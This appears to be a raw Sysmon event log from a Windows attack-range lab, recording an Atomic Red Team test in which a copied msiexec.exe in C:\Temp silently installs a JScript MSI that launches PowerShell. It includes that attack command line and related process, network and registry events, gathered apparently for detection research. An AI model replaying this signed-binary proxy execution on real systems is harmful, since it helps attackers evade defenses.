734700x80000000000000002700724Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700723Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700722Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700721Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700720Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700719Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700718Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700717Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.573{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700716Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700715Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700714Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700713Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700712Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700711Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700710Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700709Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700708Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700707Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700706Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeC:\Temp\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700704Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-EE97-62A8-7E00-000000006202}18083200C:\Windows\system32\csrss.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700703Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.557{7CF983DC-9838-62AC-5F6B-000000006202}4764372C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002700702Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.565{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9838-62AC-5F6B-000000006202}4764C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002700667Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.545{7CF983DC-9838-62AC-606B-000000006202}4088C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9838-62AC-5F6B-000000006202}4764C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002700660Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.492{7CF983DC-9838-62AC-5F6B-000000006202}4764C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 354300x80000000000000002700562Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.816{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15-64430-false185.199.110.133-443- 22542200x80000000000000002700557Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.811{7CF983DC-981D-62AC-1A6B-000000006202}4840raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;C:\Windows\System32\msiexec.exeNT AUTHORITY\SYSTEM 22542200x80000000000000002700556Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.766{7CF983DC-981D-62AC-1A6B-000000006202}4840github.com0::ffff:192.30.255.112;C:\Windows\System32\msiexec.exeNT AUTHORITY\SYSTEM 354300x80000000000000002700555Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.771{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15-64429-false192.30.255.112-443- 534500x80000000000000002700541Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.959{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 534500x80000000000000002700540Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.959{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700539Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700538Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002700537Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002700536Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002700535Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700534Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700533Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700532Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700531Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700530Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002700529Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.959{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI62FC.tmpMD5=47B535A9C2480FAD4788850FF2AE76D2,SHA256=3293A5CB821F391F6B0E1328D23B15047C4A43EFBFEEF5FEA057DBACDBD68D85falsetrue 10341000x80000000000000002700152Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}10281888C:\Windows\System32\MsiExec.exe{7CF983DC-9829-62AC-5B6B-000000006202}3084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002700151Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.722{7CF983DC-9829-62AC-5B6B-000000006202}3084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 5A1A6FD002EAB33CF0BA30CBB2A9EC06WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700150Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700149Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700148Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700147Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700146Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700145Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700144Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700143Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700142Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft 